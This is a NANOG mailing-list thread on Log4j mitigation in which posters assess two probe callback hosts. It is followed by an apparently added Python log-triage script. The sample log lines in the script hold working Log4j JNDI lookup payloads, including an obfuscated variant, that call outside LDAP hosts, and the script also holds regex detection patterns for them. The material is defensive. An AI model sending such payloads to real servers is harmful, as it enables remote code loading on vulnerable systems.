Log4j mitigation

Jean St-Laurent jean at ddostest.me
Mon Dec 13 13:32:11 UTC 2021


I agree,

As an example that backs what you're saying, I pasted the IP provided by Jörg into my browser.

http://45.83.64.1/

Here is the html page returned.

<html>
...
Research Scanning Project

This is a scanner of a research scanning project.

If you want to exclude your IPs from scans, please send an e-mail to exclude at alphastrike.io.

Thank you for your appreciation!
...
</html>

This IP scanner is in Germany and it looks legit, but a better investigation is recommended.

The second host provided looks more suspicious.

blah.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com resolves to
104.248.51.21, which is hosted on DigitalOcean.

Here is the html output:

<html>
...
Interactsh Server
Interactsh is an open-source solution for out-of-band data extraction. It is a tool designed to detect bugs that cause external interactions. These bugs include, Blind SQLi, Blind CMDi, SSRF, etc.

If you find communications or exchanges with the interactsh.com server in your logs, it is possible that someone has been testing your applications.

You should review the time when these interactions were initiated to identify the person responsible for this testing.

...
</html>

First, it's important to gain visibility and filter the good from the bad.

The first IP looks legit. The second could be reported to DigitalOcean for investigation. They usually investigate very fast.

You can check for weird network flow patterns. You can also look for that suspicious HTML file that is crawling over HTTP in clear text on your gear.

At ISP level, visibility is a must and patterns will clearly become easy to identify.

I agree with Karl that perfection is the enemy of good.

Jean

-----Original Message-----
From: NANOG <nanog-bounces+jean=ddostest.me at nanog.org> On Behalf Of Karl Auer
Sent: December 13, 2021 7:55 AM
To: NANOG List <nanog at nanog.org>
Subject: Re: Log4j mitigation

On Mon, 2021-12-13 at 06:35 -0600, Joe Greco wrote:
> Just because there are other sources of fatalities, doesn't mean you 
> can't check for the quick obvious stuff.

Indeed.

One check, even an inadequate one, is better than no checks at all. And over time you can add more checks or improve the ones you have.

Don't let "perfect" be the enemy of "good".

Regards, K.


--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)
http://www.biplane.com.au/kauer

GPG fingerprint: 61A0 99A9 8823 3A75 871E 5D90 BADB B237 260C 9C58
Old fingerprint: 2561 E9EC D868 E73C 8AF1 49CF EE50 4B1D CCA1 5170
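The triage Jean describes (pull the callback hosts out of your logs, look at what each host serves, then sort self-declared research scanners from out-of-band testing servers) as an added worked example; this is not code from the thread or from either poster. It assumes the probes arrive as Log4j `${jndi:...}` lookups in web-server access logs, uses three constructed log lines, and stands in for the HTTP fetch with `SAMPLE_BANNERS`, a dict holding condensed copies of the two pages quoted above so the script runs offline. In a real run you would GET `http://<host>/` yourself and still treat a friendly banner as a claim, not proof.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not from the original post). The first two
# carry a Log4j JNDI lookup in the User-Agent field, the second one obfuscated
# with the ${lower:} and ${::-} lookup tricks; the third is an ordinary request.
SAMPLE_LOG = r"""
203.0.113.7 - - [13/Dec/2021:12:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://blah.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}"
203.0.113.9 - - [13/Dec/2021:12:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}${::-n}di:ldap://45.83.64.1:1389/x}"
198.51.100.2 - - [13/Dec/2021:12:01:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Banners condensed from the two HTML pages quoted in the post, keyed by callback
# host. This is a constructed stand-in for fetching http://<host>/ so the example
# runs offline.
SAMPLE_BANNERS = {
    "45.83.64.1": "<html>Research Scanning Project. This is a scanner of a research scanning project. "
                  "If you want to exclude your IPs from scans, please send an e-mail to exclude at alphastrike.io.</html>",
    "blah.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com":
        "<html>Interactsh Server. Interactsh is an open-source solution for out-of-band data extraction.</html>",
}

_LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}])\}")     # ${lower:j} -> j
_LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")         # ${::-n}, ${env:X:-n} -> n
_JNDI = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|http)://([^/:}\s]+)(?::(\d+))?[^}]*\}", re.I)


def deobfuscate(s):
    """Collapse nested Log4j lookups used to hide the literal 'jndi' until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _LOOKUP_CASE.sub(lambda m: m.group(1).lower(), s)
        s = _LOOKUP_DEFAULT.sub(lambda m: m.group(1), s)
    return s


def extract_jndi_targets(log_text):
    """Return [(scheme, host, port)] for every JNDI lookup found in the log text."""
    found = []
    for line in log_text.splitlines():
        for m in _JNDI.finditer(deobfuscate(line)):
            scheme, host, port = m.group(1).lower(), m.group(2).lower(), m.group(3)
            found.append((scheme, host, int(port) if port else None))
    return found


def classify_banner(html):
    """Rough verdict from the callback host's web page. A banner is a claim, not proof."""
    text = html.lower()
    if "interactsh" in text:
        return "oob-callback-server"             # someone ran a blind-injection tool at you
    if "research scanning project" in text or "exclude your ips" in text:
        return "self-declared-research-scanner"  # plausible, still worth a closer look
    return "unknown"


def triage(log_text, banners):
    """Group JNDI callbacks by host, count hits, and attach the banner verdict."""
    hits = Counter(host for _, host, _ in extract_jndi_targets(log_text))
    return {host: {"hits": n, "verdict": classify_banner(banners.get(host, ""))}
            for host, n in hits.items()}


if __name__ == "__main__":
    for host, info in triage(SAMPLE_LOG, SAMPLE_BANNERS).items():
        print(f"{host:60s} hits={info['hits']} verdict={info['verdict']}")
```

The deobfuscation loop matters more than the classifier: most real probes hide the string `jndi` behind nested lookups, so a grep for the literal misses them, while the loop rewrites the line until the plain `${jndi:` form appears. Anything that lands in the "unknown" bucket is what you investigate first; the Interactsh bucket tells you someone was actively testing, and the research-scanner bucket is where the "better investigation" Jean recommends still applies.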